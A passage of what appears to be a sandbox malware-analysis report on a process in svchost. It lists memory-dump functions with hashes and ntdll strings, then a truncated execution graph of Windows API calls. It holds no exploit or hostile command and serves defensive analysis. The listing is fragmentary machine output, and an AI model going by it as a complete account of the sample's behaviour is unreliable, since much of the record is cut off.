                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 357e3815be04e383424d7202da5bdd3256bec30c73c0ea87fea3450405d28a36
                                                                              • Instruction ID: d9e24f8b6617e462a143ba2d99d78a6a6a85e7ba63dd81d1f0a27f8a403b8dd0
                                                                              • Opcode Fuzzy Hash: 357e3815be04e383424d7202da5bdd3256bec30c73c0ea87fea3450405d28a36
                                                                              • Instruction Fuzzy Hash: 5990023124140802D141B2584444646400E97D0341FD6C013A0424558E8B598B56AA71
                                                                              Function 03A72DD0 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 76a9db35322fc9f15a5f5e5c38d9b97aa2079b6956dfc159d178729138af2050
                                                                              • Instruction ID: 3702aab53614c89fc6c766f202ce157726bd2c79021f55c8adddd5991e8c949d
                                                                              • Opcode Fuzzy Hash: 76a9db35322fc9f15a5f5e5c38d9b97aa2079b6956dfc159d178729138af2050
                                                                              • Instruction Fuzzy Hash: F8900221242445525545F2584444547800B97E03417D6C013A1414954C8A2A9956D631
                                                                              Function 03A72D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8db3b0099dde00c0ce7373548a94028dcea12e34a0f0f36300315bf1e096eb20
                                                                              • Instruction ID: da7d611ebaac140cdcaa956a8a9830bc49e02b782710f09473408fd84780ea82
                                                                              • Opcode Fuzzy Hash: 8db3b0099dde00c0ce7373548a94028dcea12e34a0f0f36300315bf1e096eb20
                                                                              • Instruction Fuzzy Hash: A490022130140403D140B2585458646800AD7E1301F96D012E0414558CDE1989565232
                                                                              Function 03A72D00 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 962df8df9f84fa4dbfcd20879f6945b8480713fe2257470b93e01b3f55978ca6
                                                                              • Instruction ID: 202c1a662dbb0a8b21df97da26fdbef98c899174412a8f14635dcb71552abba8
                                                                              • Opcode Fuzzy Hash: 962df8df9f84fa4dbfcd20879f6945b8480713fe2257470b93e01b3f55978ca6
                                                                              • Instruction Fuzzy Hash: BD90022120544842D100B6585448A46400A87D0305F96D012A1064599DCB398951A131
                                                                              Function 03A72D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fb5a18b1fbaca51a1bb437f9345af34e51edeb33ed0e96870f1f040ef618d3e8
                                                                              • Instruction ID: 30d74a254c04f7e8553604c7050cade66c232875b9a70b6c2cc632ce732dcee0
                                                                              • Opcode Fuzzy Hash: fb5a18b1fbaca51a1bb437f9345af34e51edeb33ed0e96870f1f040ef618d3e8
                                                                              • Instruction Fuzzy Hash: B090022921340402D180B258544864A400A87D1302FD6D416A001555CCCE1989695331
                                                                              Function 03A73D10 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d09e79b07f4f0c9f03a70a93e72db37cb9da632792e0a7e4a2cc9686161b0c92
                                                                              • Instruction ID: 672b4469694b36afb9e820c61ce8931173e1ebe7a4825f9cc632e706461aa190
                                                                              • Opcode Fuzzy Hash: d09e79b07f4f0c9f03a70a93e72db37cb9da632792e0a7e4a2cc9686161b0c92
                                                                              • Instruction Fuzzy Hash: B1900231202405429540B3585844A8E810A87E1302BD6D416A0015558CCE1889615231
                                                                              Function 03A73D70 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0724a55702557b88eab522a681f65254646a936601d49c18b871fd219445dc67
                                                                              • Instruction ID: 075ed57014af68d780c9e581c0fd3fd5d9054d15b653e7f65f31ac4293f73864
                                                                              • Opcode Fuzzy Hash: 0724a55702557b88eab522a681f65254646a936601d49c18b871fd219445dc67
                                                                              • Instruction Fuzzy Hash: 5990023520140802D510B2585844686404B87D0301F96D412A042455CD8B5889A1A131
                                                                              Function 03A72CA0 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f6bbe34faf38423a2af5c2874f69607b4429775ac7edf08cb935ebffec54d0f0
                                                                              • Instruction ID: 806b039d6371e4f527156db2afec7b665d7abe141e3f5d8ac3d59411953d7dfb
                                                                              • Opcode Fuzzy Hash: f6bbe34faf38423a2af5c2874f69607b4429775ac7edf08cb935ebffec54d0f0
                                                                              • Instruction Fuzzy Hash: 9C90023120140802D100B6985448686400A87E0301F96D012A5024559ECB6989916131
                                                                              Function 03A72CF0 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 07a98a7412d0fe01d53a863fbbd752a3e3e2cc27cdaa43e0ae0223f92ba8f990
                                                                              • Instruction ID: 91d7a4e47c06e320ca148faec19256fb603671885ea1973d301cb26e87b3080e
                                                                              • Opcode Fuzzy Hash: 07a98a7412d0fe01d53a863fbbd752a3e3e2cc27cdaa43e0ae0223f92ba8f990
                                                                              • Instruction Fuzzy Hash: A390023120140803D100B2585548747400A87D0301F96D412A042455CDDB5A89516131
                                                                              Function 03A72CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fd0cd61c70e95480d2a22868317c37e6d12c7c3576a11faf8e072a87fbaa05e0
                                                                              • Instruction ID: 6c875257121a20332aef1164de5238a92b1e09c82d1a6603dc0ec3062c1801e7
                                                                              • Opcode Fuzzy Hash: fd0cd61c70e95480d2a22868317c37e6d12c7c3576a11faf8e072a87fbaa05e0
                                                                              • Instruction Fuzzy Hash: 2090022160540802D140B2585458746401A87D0301F96D012A0024558DCB5D8B5566B1
                                                                              Function 03A72C60 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ba9005bb96f146622660bdcdccae020250d42037b06e37970c204efd3a20bee6
                                                                              • Instruction ID: cf8172b1e8da8ad95efb9db8a736e593390540e95d237bffdc2c3e332be5f8f9
                                                                              • Opcode Fuzzy Hash: ba9005bb96f146622660bdcdccae020250d42037b06e37970c204efd3a20bee6
                                                                              • Instruction Fuzzy Hash: 1490023120140C42D100B2584444B86400A87E0301F96C017A0124658D8B19C9517531
                                                                              Function 03A72C70 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c081755656b2c2ee4a0969a0f1751c74fcfc9b71dfa9df4a6f7a36a7b831ef4e
                                                                              • Instruction ID: 85a7ce7d1fba9afba6edc3cc0ec763e3c3ffde9bd170bc9b91b8edcd9a3683d3
                                                                              • Opcode Fuzzy Hash: c081755656b2c2ee4a0969a0f1751c74fcfc9b71dfa9df4a6f7a36a7b831ef4e
                                                                              • Instruction Fuzzy Hash: 3D90023120148C02D110B258844478A400A87D0301F9AC412A442465CD8B9989917131
                                                                              Function 03A72C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                              • Instruction ID: 753309e0dc3e3b2c57bf69f5c6ba90d10068aba477833187e49ad9ddd6b483c7
                                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                              • Instruction Fuzzy Hash:
                                                                              Function 03A72890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID: ___swprintf_l
                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                              • API String ID: 48624451-2108815105
                                                                              • Opcode ID: efdb772acde483bd6861764ebe7ee4a00185b0615d695e62262ad3eeb6309758
                                                                              • Instruction ID: ec548c573cde0ac30e1b9fc2c60b262bfd6e5c1b0492a2015831f35271c54223
                                                                              • Opcode Fuzzy Hash: efdb772acde483bd6861764ebe7ee4a00185b0615d695e62262ad3eeb6309758
                                                                              • Instruction Fuzzy Hash: 9451B6B6A04616BFCB10DB9C8DD0A7EF7F8BB09200B18856BE4A5D7641D334DE44CBA0
                                                                              Function 03A67630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • Execute=1, xrefs: 03AA4713
                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03AA4655
                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03AA4725
                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03AA46FC
                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 03AA4787
                                                                              • ExecuteOptions, xrefs: 03AA46A0
                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03AA4742
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                              • API String ID: 0-484625025
                                                                              • Opcode ID: 7620e91770c2155ed5f3670237c5494f1820e3e3002a7780dea0961e5db58653
                                                                              • Instruction ID: d804800f09c69c4131d25540a1b71c262a40e26422fdb78533fe97d5d351d51e
                                                                              • Opcode Fuzzy Hash: 7620e91770c2155ed5f3670237c5494f1820e3e3002a7780dea0961e5db58653
                                                                              • Instruction Fuzzy Hash: E0511B396103197EDF10EB69DD85FAE73BCEF09308F0801ABE505AB291E7769A418F50
                                                                              Function 03A7B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID: __aulldvrm
                                                                              • String ID: +$-$0$0
                                                                              • API String ID: 1302938615-699404926
                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                              • Instruction ID: 692d9c299c65e652c387dedeb3a643475e05cd2aeb33f94cf9d3aef3ba7e780e
                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                              • Instruction Fuzzy Hash: 96816BB4E062499EDF24CF68CCD17EEBBB6AF46250F1C425FD861AB391C63499408B70
                                                                              Function 03A5F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 03AA02BD
                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 03AA02E7
                                                                              • RTL: Re-Waiting, xrefs: 03AA031E
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                              • API String ID: 0-2474120054
                                                                              • Opcode ID: 8171a73a522a2e2ae02657b52d39fa63da7ae1955ecb5dc9dfb5641cec53ac31
                                                                              • Instruction ID: a829cdd8fd70b01a40f07c48e17ebcbf59ac56834db0bff96b6692793dc9fac0
                                                                              • Opcode Fuzzy Hash: 8171a73a522a2e2ae02657b52d39fa63da7ae1955ecb5dc9dfb5641cec53ac31
                                                                              • Instruction Fuzzy Hash: 57E1CC31608B41DFD724CF28C984B2AB7E4BF89314F180A6EF9A58B6E1D774D944CB52
                                                                              Function 03A6BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03AA7B7F
                                                                              • RTL: Resource at %p, xrefs: 03AA7B8E
                                                                              • RTL: Re-Waiting, xrefs: 03AA7BAC
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                              • API String ID: 0-871070163
                                                                              • Opcode ID: 61908beaef8b2c082e8c6ead0c6af44ea67c14cd38f2fc56d018a4c2fc5bec77
                                                                              • Instruction ID: 9c081307b8ba9ad594f599379f55e6de82f50171cc0e9ed5beb7c738b348f49c
                                                                              • Opcode Fuzzy Hash: 61908beaef8b2c082e8c6ead0c6af44ea67c14cd38f2fc56d018a4c2fc5bec77
                                                                              • Instruction Fuzzy Hash: D541B2367007029FC724DF69CD40B6AB7E9EB89710F140A2EE956DB690DB71E4058BA1
                                                                              Function 03A6B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03AA728C
                                                                              Strings
                                                                              • RTL: Resource at %p, xrefs: 03AA72A3
                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03AA7294
                                                                              • RTL: Re-Waiting, xrefs: 03AA72C1
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                              • API String ID: 885266447-605551621
                                                                              • Opcode ID: dd123cc5c18aee18e19779f90ea561fd81ed4fff567570b827424dcb1576b59f
                                                                              • Instruction ID: 0a863f17a1bc196f58818d7adb1a92f36501d85c610dbd7bd0b90e1c26c2093c
                                                                              • Opcode Fuzzy Hash: dd123cc5c18aee18e19779f90ea561fd81ed4fff567570b827424dcb1576b59f
                                                                              • Instruction Fuzzy Hash: 2B41E136600706AFC724DF69CC41B6AB7A9FB94710F140A2FF855DB240DB31E81687E1
                                                                              Function 03A77D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID: __aulldvrm
                                                                              • String ID: +$-
                                                                              • API String ID: 1302938615-2137968064
                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                              • Instruction ID: eac62f73c55acd8fb255fd76053b445bae2821f540de45e3cc07a6c78ae7ed7e
                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                              • Instruction Fuzzy Hash: 3E91A071E002169EDB24DF69CDC1ABEB7B9AF44320F58462FE865E72C0D7368942CB50
                                                                              Function 03A39126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $$@
                                                                              • API String ID: 0-1194432280
                                                                              • Opcode ID: 63a5f381fc25654856b3000758802225db1f937adccef64e4812b2e7955b3615
                                                                              • Instruction ID: 2827f768d20e42e7bebd5ce388238204eb0253c011ccd7e41c5e8bbc1d3255ab
                                                                              • Opcode Fuzzy Hash: 63a5f381fc25654856b3000758802225db1f937adccef64e4812b2e7955b3615
                                                                              • Instruction Fuzzy Hash: 55813A76D002699BDB31DF54CD44BEAB7B8AB48710F0445EBA90DB7680E7709E84CFA0
                                                                              Function 03ABCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 03ABCFBD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID: CallFilterFunc@8
                                                                              • String ID: @$@4Dw@4Dw
                                                                              • API String ID: 4062629308-3936743583
                                                                              • Opcode ID: fe8ba21721b095157a37d8375fabe7dd780dd29d9779efa5d68bfa52154ebb89
                                                                              • Instruction ID: 73c1969ad39ba0ea85eee9d84a630e85ee2ce8e84f7ddc24cbaa14fcdde0253e
                                                                              • Opcode Fuzzy Hash: fe8ba21721b095157a37d8375fabe7dd780dd29d9779efa5d68bfa52154ebb89
                                                                              • Instruction Fuzzy Hash: 1141CF79900324DFCB21DFA4C980AAEBBB8EF85714F04456BE915DB365D774C801CB61

                                                                              Execution Graph

                                                                              Execution Coverage:3.2%
                                                                              Dynamic/Decrypted Code Coverage:4.1%
                                                                              Signature Coverage:1.5%
                                                                              Total number of Nodes:462
                                                                              Total number of Limit Nodes:75
                                                                              execution_graph 79346 28c9dcf 79347 28c9dd7 79346->79347 79350 28c9e47 79346->79350 79348 28c9de6 79347->79348 79351 28db7e0 79347->79351 79354 28d9a60 79351->79354 79353 28db7f9 79353->79348 79355 28d9a7a 79354->79355 79356 28d9a8b RtlFreeHeap 79355->79356 79356->79353 79357 28c2908 79358 28c291c 79357->79358 79361 28c6460 79358->79361 79360 28c2933 79362 28c6493 79361->79362 79363 28c64b7 79362->79363 79368 28d9220 79362->79368 79363->79360 79365 28c64da 79365->79363 79372 28d96d0 79365->79372 79367 28c655a 79367->79360 79369 28d923d 79368->79369 79375 3072ca0 LdrInitializeThunk 79369->79375 79370 28d9269 79370->79365 79373 28d96ea 79372->79373 79374 28d96fb NtClose 79373->79374 79374->79367 79375->79370 79386 3072ad0 LdrInitializeThunk 79387 28c89d7 79388 28c89da 79387->79388 79390 28c8991 79388->79390 79391 28c7250 79388->79391 79392 28c7266 79391->79392 79394 28c729f 79391->79394 79392->79394 79395 28c70c0 LdrLoadDll LdrLoadDll 79392->79395 79394->79390 79395->79394 79396 28b9f10 79397 28ba1ca 79396->79397 79399 28ba5bf 79397->79399 79400 28db440 79397->79400 79401 28db466 79400->79401 79406 28b40f0 79401->79406 79403 28db472 79404 28db4ab 79403->79404 79409 28d57f0 79403->79409 79404->79399 79413 28c33a0 79406->79413 79408 28b40fd 79408->79403 79410 28d5852 79409->79410 79412 28d585f 79410->79412 79431 28c1b70 79410->79431 79412->79404 79414 28c33bd 79413->79414 79416 28c33d6 79414->79416 79417 28da150 79414->79417 79416->79408 79419 28da16a 79417->79419 79418 28da199 79418->79416 79419->79418 79424 28d8cf0 79419->79424 79422 28db7e0 RtlFreeHeap 79423 28da212 79422->79423 79423->79416 79425 28d8d0a 79424->79425 79428 3072c0a 79425->79428 79426 28d8d36 79426->79422 79429 3072c11 79428->79429 79430 3072c1f LdrInitializeThunk 79428->79430 79429->79426 79430->79426 79432 28c1bab 79431->79432 79447 28c8040 79432->79447 79434 28c1bb3 79446 28c1e83 79434->79446 79458 28db8c0 79434->79458 79436 28c1bc9 79437 28db8c0 RtlAllocateHeap 79436->79437 79438 28c1bda 79437->79438 79439 28db8c0 RtlAllocateHeap 79438->79439 79440 28c1beb 79439->79440 79442 28c1c7f 79440->79442 79472 28c6bc0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 79440->79472 79461 28c46e0 79442->79461 79444 28c1e32 79468 28d8130 79444->79468 79446->79412 79448 28c806c 79447->79448 79473 28c7f30 79448->79473 79451 28c8099 79453 28c80a4 79451->79453 79455 28d96d0 NtClose 79451->79455 79452 28c80b1 79454 28c80cd 79452->79454 79456 28d96d0 NtClose 79452->79456 79453->79434 79454->79434 79455->79453 79457 28c80c3 79456->79457 79457->79434 79484 28d9a10 79458->79484 79460 28db8db 79460->79436 79464 28c46fc 79461->79464 79462 28c470b 79462->79444 79463 28c472a 79466 28c4757 79463->79466 79467 28c4740 LdrLoadDll 79463->79467 79464->79462 79464->79463 79487 28dcc60 LdrLoadDll 79464->79487 79466->79444 79467->79466 79469 28d8192 79468->79469 79471 28d819f 79469->79471 79488 28c1ea0 79469->79488 79471->79446 79472->79442 79474 28c8026 79473->79474 79475 28c7f4a 79473->79475 79474->79451 79474->79452 79479 28d8d90 79475->79479 79478 28d96d0 NtClose 79478->79474 79480 28d8daa 79479->79480 79483 30735c0 LdrInitializeThunk 79480->79483 79481 28c801a 79481->79478 79483->79481 79485 28d9a2d 79484->79485 79486 28d9a3e RtlAllocateHeap 79485->79486 79486->79460 79487->79463 79491 28c1ec0 79488->79491 79504 28c8310 79488->79504 79490 28c2419 79490->79471 79491->79490 79508 28d1330 79491->79508 79494 28c20d7 79516 28dc9b0 79494->79516 79495 28c1f1e 79495->79490 79511 28dc880 79495->79511 79498 28c20ec 79500 28c2136 79498->79500 79522 28c09d0 79498->79522 79500->79490 79501 28c09d0 LdrInitializeThunk 79500->79501 79525 28c82b0 79500->79525 79501->79500 79502 28c2287 79502->79500 79503 28c82b0 LdrInitializeThunk 79502->79503 79503->79502 79505 28c831d 79504->79505 79506 28c833e SetErrorMode 79505->79506 79507 28c8345 79505->79507 79506->79507 79507->79491 79529 28db750 79508->79529 79510 28d1351 79510->79495 79512 28dc896 79511->79512 79513 28dc890 79511->79513 79514 28db8c0 RtlAllocateHeap 79512->79514 79513->79494 79515 28dc8bc 79514->79515 79515->79494 79517 28dc920 79516->79517 79518 28dc97d 79517->79518 79519 28db8c0 RtlAllocateHeap 79517->79519 79518->79498 79520 28dc95a 79519->79520 79521 28db7e0 RtlFreeHeap 79520->79521 79521->79518 79536 28d9970 79522->79536 79526 28c82c3 79525->79526 79541 28d8bf0 79526->79541 79528 28c82ee 79528->79500 79532 28d9840 79529->79532 79531 28db781 79531->79510 79533 28d986e 79532->79533 79534 28d98d8 79532->79534 79533->79531 79535 28d98ee NtAllocateVirtualMemory 79534->79535 79535->79531 79537 28d998a 79536->79537 79540 3072c70 LdrInitializeThunk 79537->79540 79538 28c09f2 79538->79502 79540->79538 79542 28d8c1e 79541->79542 79543 28d8c71 79541->79543 79542->79528 79546 3072dd0 LdrInitializeThunk 79543->79546 79544 28d8c96 79544->79528 79546->79544 79547 28c72d0 79548 28c72ec 79547->79548 79550 28c733f 79547->79550 79549 28d96d0 NtClose 79548->79549 79548->79550 79551 28c7307 79549->79551 79556 28c7477 79550->79556 79558 28c66f0 NtClose LdrInitializeThunk LdrInitializeThunk 79550->79558 79557 28c66f0 NtClose LdrInitializeThunk LdrInitializeThunk 79551->79557 79553 28c7451 79553->79556 79559 28c68c0 NtClose LdrInitializeThunk LdrInitializeThunk 79553->79559 79557->79550 79558->79553 79559->79556 79560 28caf10 79565 28cac20 79560->79565 79562 28caf1d 79579 28ca890 79562->79579 79564 28caf39 79566 28cac45 79565->79566 79590 28c8520 79566->79590 79569 28cad90 79569->79562 79571 28cada7 79571->79562 79572 28cad9e 79572->79571 79574 28cae95 